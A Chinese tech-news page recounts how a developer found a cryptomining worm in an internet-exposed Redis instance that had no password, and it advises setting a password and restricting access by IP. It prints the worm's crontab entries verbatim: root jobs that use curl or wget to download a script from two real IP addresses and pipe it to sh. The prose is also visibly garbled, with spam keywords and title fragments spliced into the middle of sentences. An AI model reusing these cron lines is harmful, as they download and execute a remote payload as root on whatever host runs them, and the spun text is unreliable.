您现在的位置是:IT资讯 >>正文
事实证明,互联网会惩罚每一个裸奔的人之 Redis 扩散病毒
IT资讯13856人已围观
简介前段时间换了台电脑,一大堆开发环境我实在是懒得在本地搞了,每次启动来启动去太麻烦了,索性直接在服务器上开 Docker 部署,docker pull复制粘贴什么 Redis、什么 MySQL 分分钟装 ...
前段时间换了台电脑 ,事实证明一大堆开发环境我实在是互联懒得在本地搞了,每次启动来启动去太麻烦了,惩罚索性直接在服务器上开 Docker 部署,裸奔docker pull 复制粘贴什么 Redis、扩散什么 MySQL 分分钟装好 ,病毒要用的事实证明时候直接远程连接就行了,简直不要太方便。互联
也不是惩罚什么业务场景让我发现了这么一个病毒,高防服务器因为大部分 Redis Key 都是裸奔设置了过期时间的,开发过程也没感觉到什么问题,扩散纯粹是病毒有一天我闲着没事干 ,进入 Redis 命令行 keys * 看看,事实证明不看不要紧,互联一看好家伙 ,惩罚多出了几个 key ,大概就是建站模板下面这样子 :
复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.多出了 4 个 backup 前缀的 key,我第一反应这肯定是什么备份文件
正常情况下我根本不会在意,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈),于是,禀着好学的基本素养,服务器租用我分别查看了下这里面的 value 是什么 :
复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.wget 是用来下载东西的,curl 是用于执行 HTTP 请求,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件:

又是改权限 ,又是免费模板关防火墙删文件的 ,用屁股想都知道这 IP 肯定是国外的了:

查了下发现这是一种 Redis 扩散病毒,专门利用 Redis 未授权访问漏洞的挖矿病毒。没错,就是 Redis 没设置密码,模板下载没授权,让病毒有了可乘之机。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭,很多同学大部分时间都是在本地开发,没有设置密码的习惯或者只是简单的设置成 root 这种
另外 ,除了设置密码 ,云计算服务器开放端口的时候最好也指定下 IP,不然默认的 0.0.0.0:6379 任何 IP 都可以访问
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“信息技术视野”。http://www.bziz.cn/html/857c799135.html
相关文章
网络安全风险管理的十大关键要素
IT资讯网络安全风险管理是指识别、评估企业网络信息系统中的缺陷和风险隐患,并采取相应的安全控制以防止网络威胁,这是一个持续的过程,会随着威胁的发展而不断优化调整。网络安全风险管理和网络安全防护是两个密切相关但 ...
【IT资讯】
阅读更多GTX1070Ti散热性能解析(优秀的散热系统提升显卡性能表现)
IT资讯在现代游戏中,高性能显卡是玩家们追求更高画质和流畅游戏体验的必备装备之一。而GTX1070Ti作为一款中高端显卡,其散热性能的优劣直接影响着显卡的稳定性和性能表现。本文将重点探讨GTX1070Ti的散 ...
【IT资讯】
阅读更多以朵唯L3C怎么样?(全面评测朵唯L3C,了解其性能、功能和用户体验)
IT资讯作为一款新上市的手机,朵唯L3C引起了广大消费者的关注。它宣称拥有出色的性能和丰富的功能,但是否真的如此呢?本文将对朵唯L3C进行全面评测,从外观设计、内部配置、摄像头、电池续航等方面进行详细介绍,以 ...
【IT资讯】
阅读更多
热门文章
最新文章
友情链接
- 第二届“长城杯”信息安全铁人三项赛(防护赛)总决赛圆满收官
- 约22000名WAB客户受到针对第三方供应商的零日攻击的影响
- 微软可信签名服务遭滥用,恶意软件借机获得合法签名
- 黑客利用YouTube 平台传播复杂的恶意软件
- 2025年最佳MDR(托管检测和响应)解决方案
- 美国货币监理署邮件系统遭入侵事件被形容为惊人且严重
- 担心B2C API遭爬虫攻击?你可能忽略了一个更大的风险
- 了解 JWT、OAuth 和 Bearer 令牌
- 起亚汽车曝严重漏洞:仅凭车牌号就可远程控制汽车
- Craft CMS 零日漏洞 CVE-2025-32432 现可通过公开 Metasploit 模块利用 源码库b2b信息平台网站建设亿华云香港物理机企业服务器云服务器